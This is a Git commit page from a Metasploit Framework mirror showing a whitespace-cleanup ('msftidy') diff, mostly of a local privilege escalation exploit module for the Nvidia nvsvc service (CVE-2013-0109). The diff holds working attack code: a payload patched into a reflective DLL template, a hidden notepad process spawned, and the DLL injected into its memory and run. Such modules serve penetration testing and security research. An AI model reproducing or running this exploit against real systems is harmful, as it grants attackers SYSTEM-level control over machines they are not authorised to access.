infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

msftidy 

Conflicts:
	lib/msf/core/post/windows/services.rb
bug/bundler_fix
Meatballs 2013-07-05 22:35:22 +01:00
parent 5eca4714c2
commit 819ba30a33
2 changed files with 53 additions and 53 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/msf/core/post/windows/services.rb
View File

@ -292,7 +292,7 @@ module Services
# Now to grab a handle to the service.
# Thank you, Wine project for defining the DELETE constant since it,
# and all its friends, are missing from the MSDN docs.
# #define DELETE 0x00010000
# #define DELETE 0x00010000
handle = adv.OpenServiceA(manager, name, 0x10000)
if (handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
@ -312,7 +312,7 @@ module Services
#
# @param (see #service_start)
#
# @return {} representing lpServiceStatus
# @return {} representing lpServiceStatus
#
# @raise (see #service_start)
#

102
modules/exploits/windows/local/nvidia_nvsvc.rb
View File

@ -22,40 +22,40 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={})
super(update_info(info, {
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
'Description' => %q{
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
'Description' => %q{
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can
interact with the service. The service has a stacked based buffer overflow as a result
of a memmove operation.
N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr!
This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
},
'License' => MSF_LICENSE,
'Author' =>
'License' => MSF_LICENSE,
'Author' =>
[
'Peter Wintersmith', # Original exploit
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
],
'Arch' => ARCH_X86_64,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'Arch' => ARCH_X86_64,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
'Targets' =>
[
[ 'Automatic', { } ]
],
'Payload' =>
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'References' =>
'References' =>
[
[ 'CVE', '2013-0109' ],
[ 'OSVDB', '88745' ],
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Local
rescue RuntimeError => e
print_error("Unable to retrieve service status")
end
if sysinfo['Architecture'] =~ /WOW64/i
# Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
return Exploit::CheckCode::Detected
else
path = svc['Command'].strip
end
begin
hash = client.fs.file.md5(path).unpack('H*').first
rescue Rex::Post::Meterpreter::RequestError => e
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Local
if vuln_hashes.include?(hash)
vprint_good("Hash '#{hash}' is listed as vulnerable")
return Exploit::CheckCode::Vulnerable
else
else
vprint_status("Hash '#{hash}' is not recorded as vulnerable")
return Exploit::CheckCode::Detected
end
@ -115,20 +115,20 @@ class Metasploit3 < Msf::Exploit::Local
end
end
def create_proc
windir = expand_path("%windir%")
cmd = "#{windir}\\system32\\notepad.exe"
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
end
def create_proc
windir = expand_path("%windir%")
cmd = "#{windir}\\system32\\notepad.exe"
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
end
def is_running?
begin
status = service_status('nvsvc')
begin
status = service_status('nvsvc')
return (status and status[:state] == 4)
rescue RuntimeError => e
print_error("Unable to retrieve service status")
rescue RuntimeError => e
print_error("Unable to retrieve service status")
return false
end
end
end
@ -147,40 +147,40 @@ class Metasploit3 < Msf::Exploit::Local
else
print_good("Service is running")
end
dll = ''
offset = nil
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
pay = payload.encoded
dll = ''
offset = nil
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
bo = dll.index('PAYLOAD:')
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
dll[bo, pay.length] = [pay].pack("a*")
pay = payload.encoded
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
bo = dll.index('PAYLOAD:')
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
dll[bo, pay.length] = [pay].pack("a*")
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
print_error("No offset found") unless offset
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
new_pid = create_proc
print_error("No offset found") unless offset
if not new_pid
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
end
new_pid = create_proc
vprint_status("Injecting payload into memory")
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
host_process.memory.protect(mem)
host_process.memory.write(mem, dll)
if not new_pid
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
end
vprint_status("Injecting payload into memory")
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
host_process.memory.protect(mem)
host_process.memory.write(mem, dll)
print_status("Executing exploit...")
host_process.thread.create(mem+offset)
end